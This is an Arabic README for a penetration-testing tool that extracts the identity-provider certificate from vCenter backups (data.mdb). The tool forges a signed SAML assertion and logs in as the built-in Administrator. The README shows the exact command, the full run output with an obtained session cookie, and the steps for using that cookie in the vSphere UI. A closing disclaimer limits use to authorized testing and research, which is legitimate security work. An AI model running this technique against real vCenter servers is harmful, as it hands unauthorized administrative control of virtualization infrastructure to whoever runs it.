
أداة لاستخراج شهادة IdP من النسخ الاحتياطية لـ vCenter وتسجيل الدخول كمسؤول.
أداة لاستخراج شهادة موفّر الهوية (IdP) من النسخ الاحتياطية لـ vCenter وتسجيل الدخول كمسؤول (Administrator)
عادةً، أثناء الاختبارات الأمنية، نحصل على إمكانية الوصول إلى النسخ الاحتياطية لـ vCenter على خادم ملفات أو الوصول الجذري (root) إلى مضيف VCSA من خلال ثغرات CVE الحديثة. يتيح لنا تسجيل الدخول إلى واجهة vSphere UI الخاصة بـ vCenter الوصول بسهولة إلى المزيد من الأنظمة والمعلومات السرية، بالإضافة إلى إظهار تأثير هذه النتائج للعملاء.
يحتوي ملف data.mdb على الشهادات ويمكن العثور عليه داخل النسخ الاحتياطية لـ vCenter وكذلك على مضيف VCSA بصلاحيات الجذر. تُخزَّن هذه الشهادات كنص صريح ويمكن استخدامها لتوقيع أي طلب مصادقة SAML لأي مستخدم - بما في ذلك حساب Administrator المدمج.
إذا كنت ترغب في معرفة المزيد عن حالات الاستخدام المتعددة لهذه الأداة وكيف استخدمناها للحصول على وصول إداري إلى مضيفات vCenter، فاطّلع على مقالنا في المدونة: https://www.horizon3.ai/compromising-vcenter-via-saml-certificates/
root@kali:~/vcenter# python3 vcenter_saml_login.py -p data.mdb -t 10.0.100.200
[*] Successfully extracted the IdP certificate
[*] Successfully extracted trusted certificate 1
[*] Successfully extracted trusted certificate 2
[*] Obtaining hostname from vCenter SSL certificate
[*] Found hostname vcsa.olympus for 10.0.100.200
[*] Initiating SAML request with 10.0.100.200
[*] Generating SAML assertion
[*] Signing the SAML assertion
[*] Attempting to log into vCenter with the signed SAML request
[+] Successfuly obtained Administrator cookie for 10.0.100.200!
[+] Cookie: VSPHERE-UI-JSESSIONID=06D1630719B4DE33A4CE653458911640
باستخدام ملف تعريف الارتباط (الكوكيز) أعلاه، قم بزيارة مثيل VCSA على https://<VCSA>/ui، وأضف ملف تعريف الارتباط ضمن المسار /ui، ثم أعد التصفح إلى https://<VCSA>/ui.

تم إنشاء هذا البرنامج لأغراض البحث الأكاديمي وتطوير تقنيات دفاعية فعّالة فقط، وليس المقصود استخدامه لمهاجمة الأنظمة إلا عند التصريح بذلك صراحةً. لا يتحمل القائمون على صيانة المشروع أي مسؤولية عن سوء استخدام هذا البرنامج. استخدمه بمسؤولية.